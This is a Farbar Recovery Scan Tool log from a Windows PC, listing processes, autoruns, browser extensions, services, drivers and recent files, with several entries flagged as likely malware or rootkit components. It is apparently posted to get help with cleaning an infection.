(www.shadowexplorer.com) C:\Program File (x86) ShadowExplorer\ShadowExplorer\sesvc.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe
() C:\Users\Dan\AppData\Local\aucozre\aucozre.exe
() C:\Users\Dan\AppData\Local\aucozre\nvhuamg.exe
() C:\Users\Dan\AppData\Local\aucozre\nvhuamg.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLoader.exe
(VMware, Inc.) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
(VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe
() C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\CCXProcess.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe
(Node.js) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\libs\node.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPCenter.exe
(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSPanel.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Waves Audio Ltd.) C:\Program Files\Realtek\Audio\HDA\MaxxAudioControl64.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPHelper.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Microsoft Corporation) C:\Program Files\Windows NT\Accessories\wordpad.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10}] => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [1610936 2016-07-10] (COMODO)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [WebStorage] => C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\ASUSWSLoader.exe [63296 2014-02-25] ()
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [95192 2013-03-08] (CyberLink Corp.)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [1980416 2013-12-18] (Wondershare)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-04-21] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime Alternative\QTTask.exe [421888 2013-05-01] (Apple Inc.)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2383040 2016-08-24] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [chrome] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1589592 2018-03-20] (Google Inc.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer: [NoInternetOpenWith] 1
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Run: [xdm] => C:\Users\Dan\AppData\Local\XDM\xdm.exe [782848 2014-11-15] (Subhra Das Gupta)
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8641240 2016-02-12] (Piriform Ltd)
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MountPoints2: {536ca0a9-5ee7-11e8-8342-10c37bbb446b} - "D:\windows\AutoRun.exe"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MountPoints2: {536ca102-5ee7-11e8-8342-10c37bbb446b} - "D:\windows\AutoRun.exe"
AppInit_DLLs-x32: C:\ProgramData\TeamVieverService.dll => C:\ProgramData\TeamVieverService.dll [267264 2018-03-23] ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HandyAndy.lnk [2016-05-16]
ShortcutTarget: HandyAndy.lnk -> C:\Program Files\Andy\HandyAndy.exe ()

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

ProxyEnable: [.DEFAULT] => Proxy is enabled.
ProxyServer: [.DEFAULT] => http=127.0.0.1:61746;https=127.0.0.1:61746
ProxyEnable: [S-1-5-21-1066246007-1091995785-1061003623-1001] => Proxy is enabled.
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\..\Interfaces\{4BFECB1F-C4F4-478B-9423-CF38BB3D1339}: [DhcpNameServer] 167.206.112.3 167.206.112.4
Tcpip\..\Interfaces\{ADE3F806-57EF-4246-85D9-1A41A1425F70}: [DhcpNameServer] 208.67.222.222 208.67.220.220

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?gws_rd=ssl
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\ssv.dll [2016-02-07] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\jp2ssv.dll [2016-02-07] (Oracle Corporation)

FireFox:
========
FF DefaultProfile: jefccanc.Daniel-1506042165545
FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default [2018-05-29]
FF Extension: (Avira Browser Safety) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\abs@avira.com.xpi [2017-06-17]
FF Extension: (Quick Searcher) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\mefhakmgclhhfbdadeojlkbllmecialg@chrome-store-foxified-1132576233 [2018-03-22]
FF Extension: (Video DownloadHelper) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2017-05-31] [Legacy]
FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\uxz090y6.default-1505963547810 [2018-05-29]
FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\jefccanc.Daniel-1506042165545 [2018-05-29]
FF HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Firefox\Extensions: [xdmff@xdman.sourceforge.net] - C:\Users\Dan\AppData\Local\XDM\xdmff
FF Extension: (XDM Helper) - C:\Users\Dan\AppData\Local\XDM\xdmff [2016-04-03] [Legacy] [not signed]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-08-24] (Adobe Systems)
FF Plugin-x32: @java.com/DTPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\dtplugin\npDeployJava1.dll [2016-02-07] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\plugin2\npjp2.dll [2016-02-07] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-04-01] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-15] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-15] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program File (x86) VLC Media Player VideoLan\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program File (x86) VLC Media Player VideoLan\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [No File]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-02-11] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-08-24] (Adobe Systems)
FF Plugin HKU\S-1-5-21-1066246007-1091995785-1061003623-1001: signiant.com/SigniantTransfer -> C:\Users\Dan\AppData\Roaming\SigniantInc\SigniantTransfer\5.4.4.71844\npSigniantTransfer.dll [2015-07-09] (Signiant Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> search.mpc.am
CHR StartupUrls: Default -> "hxxps://www.google.com/"
CHR Profile: C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default [2018-05-29]
CHR Extension: (Slides) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-22]
CHR Extension: (Facebook Video Downloader - Save FB Video) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\amjcoehkcacocffpmhnefgoeanepjfkf [2018-03-20]
CHR Extension: (Docs) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-22]
CHR Extension: (Instagram tools) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apchgljmbdmgpelofkpfaghmjcgkcmmb [2016-04-03]
CHR Extension: (Google Drive) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-04-03]
CHR Extension: (Audiotool) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkgoccjhfjgjedhkiefaclppgbmoobnk [2016-04-03]
CHR Extension: (YouTube) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-04-03]
CHR Extension: (Nimbus Screenshot & Screen Video Recorder) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\bpconcjcammlapcogcnnelfmaeghhagj [2018-02-04]
CHR Extension: (APK Downloader) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgihflhdpokeobcfimliamffejfnmfii [2016-04-03]
CHR Extension: (Google Search) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-04-03]
CHR Extension: (Sheets) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-22]
CHR Extension: (Avira Browser Safety) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2017-06-10]
CHR Extension: (Trevx - Music Downloader) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmaepaboafhefdejcbiciklgjogoghf [2016-05-15]
CHR Extension: (Google Docs Offline) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-04-03]
CHR Extension: (Video DownloadHelper) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjnegcaeklhafolokijcfjliaokphfk [2016-12-20]
CHR Extension: (Video Converter) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcjjnhgakghmggnimjkldjmmpabhnhne [2016-03-08]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22]
CHR Extension: (Image Search) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\oeofhjjmgagmjigkfgghbnjjeibokcik [2016-11-22]
CHR Extension: (Notifications for Instagram) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\opnbmdkdflhjiclaoiiifmheknpccalb [2018-01-15]
CHR Extension: (Quick Searcher) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha [2018-03-22]
CHR Extension: (Adobe HDS / HLS Video Saver) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pibndofbpkoaipoidbkephfhhnapkccn [2018-03-08]
CHR Extension: (Gmail) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-04-03]
CHR Extension: (Chrome Media Router) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-03-22]
CHR Extension: (Instagram) - C:\Program File (x86) ArcWelder - Android Simulator (Google Chrome) - Instagram\com.instagram.android.apk_export_eznre [2016-03-13]
CHR Profile: C:\Users\Dan\AppData\Local\Google\Chrome\User Data\System Profile [2018-05-29]
CHR Extension: (Quick Searcher) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pbdpajcdgknpendpmecafmopknefafha [2018-03-22]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

HKLM\SYSTEM\CurrentControlSet\Services\eubtvna <==== ATTENTION (Rootkit!)

S2 6320c4d4d9492959f6f8b43b8fdbf2f5; C:\Program Files\6320c4d4d9492959f6f8b43b8fdbf2f5\890117e400ab1707a9d681317614c87e.exe [1795584 2018-03-22] () [File not signed] <==== ATTENTION
R2 9b2582d4a23748e2d93e755c9fbf7de5; C:\Windows\9b2582d4a23748e2d93e755c9fbf7de5.dll [2150400 2018-03-22] () [File not signed]
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-08-24] (Adobe Systems Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2021056 2016-03-03] (Adobe Systems, Incorporated)
R2 Asus WebStorage Windows Service; C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSWinService.exe [71680 2014-02-25] (ASUS Cloud Corporation) [File not signed]
S2 CmdAgent; C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe [5817256 2016-07-10] (COMODO)
S3 cmdvirth; C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe [2271928 2016-07-10] (COMODO)
R2 dahhService; C:\ProgramData\dahhService\dahhService.exe [369872 2018-03-22] ()
R2 gramblrclient; C:\Program Files\Gramblr\gramblr.exe [12021840 2018-03-07] () [File not signed]
S4 gzserv; C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\gzserv.exe [79552 2018-03-08] (Bitdefender)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [733696 2013-07-01] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-01] (Intel® Corporation)
S2 MBAMService; C:\Program File (x86) Malwarebytes Anti-Malware - VER. 2-B\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-02-28] (Riverbed Technology, Inc.)
R2 sesvc; C:\Program File (x86) ShadowExplorer\ShadowExplorer\sesvc.exe [9216 2011-01-02] (www.shadowexplorer.com) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [368632 2014-09-21] (Microsoft Corporation)
S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2014-09-21] (Microsoft Corporation)
S2 GamesAppIntegrationService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe" [X]
S3 GamesAppService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe" [X]
S4 windowsmanagementservice; windowsmanagementservice [X] <==== ATTENTION

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 6bbfa1b48d3fadbf9e2e973e703b29a9; C:\Windows\system32\drivers\6bbfa1b48d3fadbf9e2e973e703b29a9.sys [79776 2018-03-22] ()
R3 athr; C:\Windows\system32\DRIVERS\athwbx.sys [3892224 2014-03-07] (Qualcomm Atheros Communications, Inc.)
R3 ATP; C:\Windows\System32\drivers\AsusTP.sys [71952 2014-03-31] (ASUS Corporation)
R0 avc3; C:\Windows\System32\DRIVERS\avc3.sys [718840 2013-04-17] (BitDefender)
U5 avchv; C:\Windows\System32\Drivers\avchv.sys [261056 2016-03-06] (BitDefender)
S3 avckf; C:\Windows\System32\DRIVERS\avckf.sys [593144 2013-04-17] (BitDefender)
R1 bdfwfpf; C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\bdfwfpf.sys [121928 2013-07-02] (Bitdefender SRL)
R1 cmderd; C:\Windows\System32\DRIVERS\cmderd.sys [32224 2016-07-10] (COMODO)
R1 cmdGuard; C:\Windows\System32\DRIVERS\cmdguard.sys [851864 2016-07-10] (COMODO)
R1 cmdhlp; C:\Windows\system32\DRIVERS\cmdhlp.sys [45600 2016-07-10] (COMODO)
R1 gzflt; C:\Windows\System32\DRIVERS\gzflt.sys [148696 2013-04-22] (BitDefender LLC)
R1 inspect; C:\Windows\system32\DRIVERS\inspect.sys [138568 2016-07-10] (COMODO)
R3 kbfiltr; C:\Windows\System32\drivers\kbfiltr.sys [17280 2012-08-05] ( )
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R0 MBI; C:\Windows\System32\drivers\MBI.sys [29464 2013-10-27] (Intel Corporation)
S3 NPF; C:\Windows\System32\drivers\npf.sys [36600 2013-02-28] (Riverbed Technology, Inc.)
R3 TotRec8; C:\Windows\system32\drivers\TotRec8.sys [125640 2014-04-30] (High Criteria inc.)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [24688 2017-06-09] ()
R0 trufos; C:\Windows\System32\DRIVERS\trufos.sys [382536 2013-05-28] (BitDefender S.R.L.)
R3 TXEIx64; C:\Windows\System32\drivers\TXEIx64.sys [88592 2014-01-15] (Intel Corporation)
R3 VASDeviceDrm; C:\Windows\system32\drivers\vasdDev.sys [1454896 2012-03-19] (ShiningMorning Inc.)
R0 vsock; C:\Windows\System32\drivers\vsock.sys [73296 2013-10-08] (VMware, Inc.)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [35320 2014-09-21] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [258368 2014-09-21] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2014-09-21] (Microsoft Corporation)
R3 ehkoru; system32\drivers\knruxb.sys [X]
S4 hrlvm; System32\drivers\usbcmpvz.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-05-31 20:48 - 2018-05-31 20:49 - 000022194 _____ C:\Users\Dan\Desktop\FRST.txt
2018-05-31 20:46 - 2018-05-31 19:26 - 002413056 _____ (Farbar) C:\Users\Dan\Desktop\FRST64.exe
2018-05-31 20:24 - 2018-05-31 20:24 - 000000000 ____D C:\Users\Dan\AppData\Local\sinxrlt
2018-05-30 23:23 - 2018-05-30 23:23 - 000142672 ____N C:\Windows\system32\Drivers\cooeilos.sys
2018-05-30 22:04 - 2018-05-30 22:04 - 000000077 _____ C:\Users\Dan\AppData\Local\smplayerhdpi.ini
2018-05-30 20:20 - 2018-05-30 20:20 - 000000000 ____D C:\Users\Dan\AppData\Local\mbiczhw
2018-05-29 20:47 - 2018-05-29 21:04 - 000003084 _____ C:\Windows\System32\Tasks\{D3CF4331-7A31-4F84-BB21-69FA5F743E7A}
2018-05-29 20:16 - 2018-05-29 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\avcsxeg
2018-05-28 20:16 - 2018-05-28 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\dtiroaw
2018-05-27 20:40 - 2018-05-27 20:40 - 000000146 _____ C:\Users\Dan\Desktop\Windows Defender - Shortcut.lnk
2018-05-27 20:12 - 2018-05-27 20:12 - 000000000 ____D C:\Users\Dan\AppData\Local\vdmbsup
2018-05-26 19:39 - 2018-05-26 19:39 - 000000000 ____D C:\Users\Dan\AppData\Local\cgkeslp
2018-05-25 20:18 - 2018-05-25 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\nimzwrx
2018-05-24 20:16 - 2018-05-24 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\svhznix
2018-05-23 23:10 - 2018-05-23 23:10 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2018-05-23 21:13 - 2018-05-23 21:13 - 000081134 _____ C:\Users\Dan\AppData\Local\recently-used.xbel
2018-05-23 20:16 - 2018-05-23 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\coeaubg
2018-05-22 20:15 - 2018-05-22 20:15 - 000000000 ____D C:\Users\Dan\AppData\Local\lsrgdch
2018-05-21 18:54 - 2018-05-21 18:54 - 000000000 ____D C:\Users\Dan\AppData\Local\tihexad
2018-05-20 19:05 - 2018-05-20 19:05 - 000000000 ____D C:\Users\Dan\AppData\Local\rtksgep
2018-05-19 19:36 - 2018-05-19 19:36 - 000000000 ____D C:\Users\Dan\AppData\Local\usbziol
2018-05-18 20:19 - 2018-05-18 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\mskiwue
2018-05-17 20:18 - 2018-05-17 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\wictgzl
2018-05-16 20:14 - 2018-05-16 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\scdhbzo
2018-05-15 20:14 - 2018-05-15 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\dwczukm
2018-05-14 20:11 - 2018-05-14 20:11 - 000000000 ____D C:\Users\Dan\AppData\Local\wihnxoc
2018-05-13 20:26 - 2018-05-13 20:26 - 000000000 ____D C:\Users\Dan\AppData\Local\dwockil
2018-05-12 19:41 - 2018-05-12 19:41 - 000000000 ____D C:\Users\Dan\AppData\Local\csdhnlo
2018-05-11 20:22 - 2018-05-11 20:22 - 000000000 ____D C:\Users\Dan\AppData\Local\coiblsg
2018-05-10 20:22 - 2018-05-10 20:22 - 000000000 ____D C:\Users\Dan\AppData\Local\widxtlb
2018-05-09 20:13 - 2018-05-09 20:13 - 000000000 ____D C:\Users\Dan\AppData\Local\seagduw
2018-05-08 20:41 - 2018-05-08 20:41 - 000000000 ____D C:\Users\Dan\AppData\Local\vdngxtz
2018-05-07 20:13 - 2018-05-07 20:13 - 000000000 ____D C:\Users\Dan\AppData\Local\nibrvwa
2018-05-06 22:10 - 2018-05-06 22:10 - 000838852 _____ C:\Users\Dan\Documents\gwyneth_paltrow_27c1e.xcf
2018-05-06 20:19 - 2018-05-06 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\pcbgxvh
2018-05-05 19:18 - 2018-05-05 19:18 - 000000000 ____D C:\Users\Dan\AppData\Local\wmeapzk
2018-05-04 20:20 - 2018-05-04 20:20 - 000000000 ____D C:\Users\Dan\AppData\Local\usizorv
2018-05-03 20:14 - 2018-05-03 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\csdkxma
2018-05-02 20:04 - 2018-05-02 20:04 - 000000000 ____D C:\Users\Dan\AppData\Local\cwnairx
2018-05-01 20:22 - 2018-05-01 20:22 - 000000000 ____D C:\Users\Dan\AppData\Local\webnulm

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-05-31 20:48 - 2016-03-03 14:05 - 000000000 ____D C:\FRST
2018-05-31 20:45 - 2016-07-18 13:30 - 000000000 ____D C:\Users\Dan\Desktop\Video & Various Software Shortcuts
2018-05-31 20:37 - 2018-03-22 21:52 - 000000004 _____ C:\ProgramData\lock.dat
2018-05-31 20:36 - 2015-02-09 00:09 - 000000000 __RDO C:\Users\Dan\OneDrive
2018-05-31 20:36 - 2015-02-01 10:08 - 000000000 ____D C:\Users\Dan\AppData\Local\Adobe
2018-05-31 20:34 - 2017-03-29 19:14 - 000000074 _____ C:\Users\Dan\AppData\Roaming\sp_data.sys
2018-05-31 20:26 - 2015-11-12 20:24 - 000000000 ____D C:\ProgramData\VMware
2018-05-31 20:24 - 2018-03-22 21:53 - 000000000 ____D C:\Users\Dan\AppData\Local\aucozre
2018-05-31 20:24 - 2018-03-22 21:52 - 000000292 _____ C:\ProgramData\rwi.hhad
2018-05-31 20:23 - 2015-11-13 20:19 - 000000000 ____D C:\ProgramData\Gramblr
2018-05-31 20:23 - 2013-08-22 10:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-05-31 20:22 - 2018-03-22 21:52 - 002888704 _____ (TOSHIBA CORPORATION) C:\Windows\system32\avmhengsvc.exe
2018-05-30 23:23 - 2013-08-22 09:25 - 012582912 _____ C:\Windows\system32\config\HARDWARE
2018-05-30 22:04 - 2016-06-12 19:00 - 000000000 ____D C:\Users\Dan\.smplayer
2018-05-29 22:18 - 2018-03-24 18:39 - 000000000 ____D C:\Users\Dan\AppData\Local\ElevatedDiagnostics
2018-05-29 22:17 - 2013-08-22 09:36 - 000000000 ____D C:\Windows\Inf
2018-05-29 21:55 - 2015-02-03 07:57 - 000000000 ____D C:\Users\Dan\AppData\Local\ocenaudio
2018-05-29 21:19 - 2017-01-25 19:42 - 000000000 ____D C:\Windows\Minidump
2018-05-29 21:19 - 2016-03-07 20:08 - 000000000 ____D C:\Users\Dan\AppData\Local\CrashDumps
2018-05-29 21:04 - 2018-03-22 21:50 - 000003626 _____ C:\Windows\System32\Tasks\{81D52804-7B29-49D2-80AA-07954E82952B}
2018-05-29 21:04 - 2018-03-22 21:50 - 000003424 _____ C:\Windows\System32\Tasks\{C26243DB-2C37-44EE-9F28-CE2E8B7FC0E3}
